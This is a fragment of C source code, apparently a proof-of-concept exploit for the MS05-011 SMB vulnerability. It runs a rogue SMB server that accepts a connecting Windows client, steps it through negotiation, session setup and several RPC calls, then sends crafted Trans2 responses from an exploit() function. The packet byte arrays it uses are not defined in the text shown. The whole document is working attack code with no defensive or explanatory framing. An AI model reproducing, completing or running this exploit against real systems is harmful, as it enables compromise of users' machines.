microsoft server message block (smb) remote exploit (ms05-011).txt

一些可以实现益出的程序

unsigned char wks[] = "\x77\x6b\x73";

bzero ( &response, sizeof ( response ) );
recv ( s, response, sizeof ( response ) -1, 0 );

printf ( "SmbNtCreate\n" );
SmbNtCreate[30] = response[30];
SmbNtCreate[31] = response[31];
SmbNtCreate[34] = response[34];
SmbNtCreate[35] = response[35];

strncpy ( SmbNtCreate + 28, ( unsigned char* ) &treeid, 2 );
strncpy ( SmbNtCreate + 32, ( unsigned char* ) &userid, 2 );
strncpy ( SmbNtCreate + 42, ( unsigned char* ) &fid, 2 );

send ( s, SmbNtCreate, sizeof ( SmbNtCreate ) -1, 0 );

bzero ( &response, sizeof ( response ) );
recv ( s, response, sizeof ( response ) -1, 0 );

printf ( "DceRpc\n" );
DceRpc[30] = response[30];
DceRpc[31] = response[31];
DceRpc[34] = response[34];
DceRpc[35] = response[35];

strncpy ( DceRpc + 28, ( unsigned char* ) &treeid, 2 );
strncpy ( DceRpc + 32, ( unsigned char* ) &userid, 2 );
strncpy ( DceRpc + 80, ( unsigned char* ) &assocgroup, 2 );

ret = check_interface ( response );
if ( ret == 0 )
memcpy ( DceRpc + 92, wks, 3 );
else if ( ret == 1 )
memcpy ( DceRpc + 92, srv, 3 );
else if ( ret == 2 );
else if ( ret == 3 );
else
{
printf ( "invalid interface uuid, aborting...\n" );
exit ( 1 );
}

send ( s, DceRpc, sizeof ( DceRpc ) -1, 0 );

bzero ( &response, sizeof ( response ) );
recv ( s, response, sizeof ( response ) -1, 0 );

if ( option == 1 )
{
printf ( "NetrShareEnum\n" );
NetrShareEnum[30] = response[30];
NetrShareEnum[31] = response[31];
NetrShareEnum[34] = response[34];
NetrShareEnum[35] = response[35];

strncpy ( NetrShareEnum + 28, ( unsigned char* ) &treeid, 2 );
strncpy ( NetrShareEnum + 32, ( unsigned char* ) &userid, 2 );

send ( s, NetrShareEnum, sizeof ( NetrShareEnum ) -1, 0 );
}
else if ( ( option == 2 ) && ( ret == 2 ) )
{
printf ( "OpenPrinterEx\n" );
OpenPrinterEx[30] = response[30];
OpenPrinterEx[31] = response[31];
OpenPrinterEx[34] = response[34];
OpenPrinterEx[35] = response[35];

strncpy ( OpenPrinterEx + 28, ( unsigned char* ) &treeid, 2 );
strncpy ( OpenPrinterEx + 32, ( unsigned char* ) &userid, 2 );

send ( s, OpenPrinterEx, sizeof ( OpenPrinterEx ) -1, 0 );

bzero ( &response, sizeof ( response ) );
recv ( s, response, sizeof ( response ) -1, 0 );

printf ( "ClosePrinter\n" );
ClosePrinter[30] = response[30];
ClosePrinter[31] = response[31];
ClosePrinter[34] = response[34];
ClosePrinter[35] = response[35];

strncpy ( ClosePrinter + 28, ( unsigned char* ) &treeid, 2 );
strncpy ( ClosePrinter + 32, ( unsigned char* ) &userid, 2 );

send ( s, ClosePrinter, sizeof ( ClosePrinter ) -1, 0 );
}
else if ( ( option == 3 ) && ( ret == 3 ) )
{
printf ( "OpenHklm\n" );
OpenHklm[30] = response[30];
OpenHklm[31] = response[31];
OpenHklm[34] = response[34];
OpenHklm[35] = response[35];

strncpy ( OpenHklm + 28, ( unsigned char* ) &treeid, 2 );
strncpy ( OpenHklm + 32, ( unsigned char* ) &userid, 2 );

send ( s, OpenHklm, sizeof ( OpenHklm ) -1, 0 );

bzero ( &response, sizeof ( response ) );
recv ( s, response, sizeof ( response ) -1, 0 );

printf ( "OpenKey\n" );
OpenKey[30] = response[30];
OpenKey[31] = response[31];
OpenKey[34] = response[34];
OpenKey[35] = response[35];

strncpy ( OpenKey + 28, ( unsigned char* ) &treeid, 2 );
strncpy ( OpenKey + 32, ( unsigned char* ) &userid, 2 );

send ( s, OpenKey, sizeof ( OpenKey ) -1, 0 );

bzero ( &response, sizeof ( response ) );
recv ( s, response, sizeof ( response ) -1, 0 );

printf ( "CloseKey\n" );
CloseKey[30] = response[30];
CloseKey[31] = response[31];
CloseKey[34] = response[34];
CloseKey[35] = response[35];

strncpy ( CloseKey + 28, ( unsigned char* ) &treeid, 2 );
strncpy ( CloseKey + 32, ( unsigned char* ) &userid, 2 );

send ( s, CloseKey, sizeof ( CloseKey ) -1, 0 );
}
else if ( option == 4 )
{
printf ( "NetBios1\n" );
NetBios1[30] = response[30];
NetBios1[31] = response[31];
NetBios1[34] = response[34];
NetBios1[35] = response[35];

strncpy ( NetBios1 + 28, ( unsigned char* ) &treeid, 2 );
strncpy ( NetBios1 + 32, ( unsigned char* ) &userid, 2 );

send ( s, NetBios1, sizeof ( NetBios1 ) -1, 0 );
}
else
{
if ( ret == 0 )
{
printf ( "WksSvc\n" );
WksSvc[30] = response[30];
WksSvc[31] = response[31];
WksSvc[34] = response[34];
WksSvc[35] = response[35];

strncpy ( WksSvc + 28, ( unsigned char* ) &treeid, 2 );
strncpy ( WksSvc + 32, ( unsigned char* ) &userid, 2 );

send ( s, WksSvc, sizeof ( WksSvc ) -1, 0 );
}
else
{
printf ( "SrvSvc\n" );
SrvSvc[30] = response[30];
SrvSvc[31] = response[31];
SrvSvc[34] = response[34];
SrvSvc[35] = response[35];

strncpy ( SrvSvc + 28, ( unsigned char* ) &treeid, 2 );
strncpy ( SrvSvc + 32, ( unsigned char* ) &userid, 2 );

send ( s, SrvSvc, sizeof ( SrvSvc ) -1, 0 );
}
}

bzero ( &response, sizeof ( response ) );
recv ( s, response, sizeof ( response ) -1, 0 );

printf ( "SmbClose\n" );
SmbClose[30] = response[30];
SmbClose[31] = response[31];
SmbClose[34] = response[34];
SmbClose[35] = response[35];

strncpy ( SmbClose + 28, ( unsigned char* ) &treeid, 2 );
strncpy ( SmbClose + 32, ( unsigned char* ) &userid, 2 );

send ( s, SmbClose, sizeof ( SmbClose ) -1, 0 );
}

void
exploit ( int s, unsigned long fid, unsigned long assocgroup, unsigned long userid, unsigned long treeid )
{
char response[1024];

bzero ( &response, sizeof ( response ) );
recv ( s, response, sizeof ( response ) -1, 0 );

printf ( "NetBios2\n" );
NetBios2[30] = response[30];
NetBios2[31] = response[31];
NetBios2[34] = response[34];
NetBios2[35] = response[35];

strncpy ( NetBios2 + 28, ( unsigned char* ) &treeid, 2 );
strncpy ( NetBios2 + 32, ( unsigned char* ) &userid, 2 );

send ( s, NetBios2, sizeof ( NetBios2 ) -1, 0 );

bzero ( &response, sizeof ( response ) );
recv ( s, response, sizeof ( response ) -1, 0 );

printf ( "Trans2Response1\n" );
Trans2Response1[30] = response[30];
Trans2Response1[31] = response[31];
Trans2Response1[34] = response[34];
Trans2Response1[35] = response[35];

strncpy ( Trans2Response1 + 28, ( unsigned char* ) &treeid, 2 );
strncpy ( Trans2Response1 + 32, ( unsigned char* ) &userid, 2 );

send ( s, Trans2Response1, sizeof ( Trans2Response1 ) -1, 0 );

bzero ( &response, sizeof ( response ) );
recv ( s, response, sizeof ( response ) -1, 0 );

printf ( "Trans2Response2\n" );
Trans2Response2[30] = response[30];
Trans2Response2[31] = response[31];
Trans2Response2[34] = response[34];
Trans2Response2[35] = response[35];

strncpy ( Trans2Response2 + 28, ( unsigned char* ) &treeid, 2 );
strncpy ( Trans2Response2 + 32, ( unsigned char* ) &userid, 2 );

send ( s, Trans2Response2, sizeof ( Trans2Response2 ) -1, 0 );

bzero ( &response, sizeof ( response ) );
recv ( s, response, sizeof ( response ) -1, 0 );

printf ( "Trans2Response3\n" );
Trans2Response3[30] = response[30];
Trans2Response3[31] = response[31];
Trans2Response3[34] = response[34];
Trans2Response3[35] = response[35];

strncpy ( Trans2Response3 + 28, ( unsigned char* ) &treeid, 2 );
strncpy ( Trans2Response3 + 32, ( unsigned char* ) &userid, 2 );

send ( s, Trans2Response3, sizeof ( Trans2Response3 ) -1, 0 );
}

int
main ( int argc, char* argv[] )
{
int s1, s2, i;
unsigned long fid = 0x1337;
unsigned long treeid = 0x0808;
unsigned long userid = 0x0808;
unsigned long assocgroup = 0x4756;
pid_t childpid;
socklen_t clilen;
struct sockaddr_in cliaddr, servaddr;

bzero ( &servaddr, sizeof ( servaddr ) );
servaddr.sin_family = AF_INET;
servaddr.sin_addr.s_addr = htonl ( INADDR_ANY );
servaddr.sin_port = htons ( PORT );

s1 = socket ( AF_INET, SOCK_STREAM, 0 );
bind ( s1, ( struct sockaddr * ) &servaddr, sizeof ( servaddr ) );
listen ( s1, 1 );

clilen = sizeof ( cliaddr );

s2 = accept ( s1, ( struct sockaddr * ) &cliaddr, &clilen );

close ( s1 );

printf ( "\n%s\n\n", inet_ntoa ( cliaddr.sin_addr ) );

neg ( s2 ); // Negotiate
sessionsetup ( s2, userid, treeid, 0 ); // SessionSetup
for ( i = 0; i < 15; i++ )
{
digg ( s2, fid, assocgroup, userid, treeid, 0 );
fid++;
assocgroup ++;
}
digg ( s2, fid, assocgroup, userid, treeid, 1 ); // NetrShareEnum
fid++;
assocgroup ++;
digg ( s2, fid, assocgroup, userid, treeid, 2 ); // spoolss
fid++;
assocgroup ++;
for ( i = 0; i < 4; i++ )
{
digg ( s2, fid, assocgroup, userid, treeid, 0 );
fid++;
assocgroup ++;
}
digg ( s2, fid, assocgroup, userid, treeid, 3 ); // WinReg
userid++;
treeid++;
sessionsetup ( s2, userid, treeid, 1 ); // SessionSetup
userid--;
treeid--;
for ( i = 0; i < 2; i++ )
{
digg ( s2, fid, assocgroup, userid, treeid, 4 ); // NetBios
fid++;
assocgroup ++;
}
treeid += 2;
exploit ( s2, fid, assocgroup, userid, treeid );

printf ( "done!\n" );

close ( s2 );
}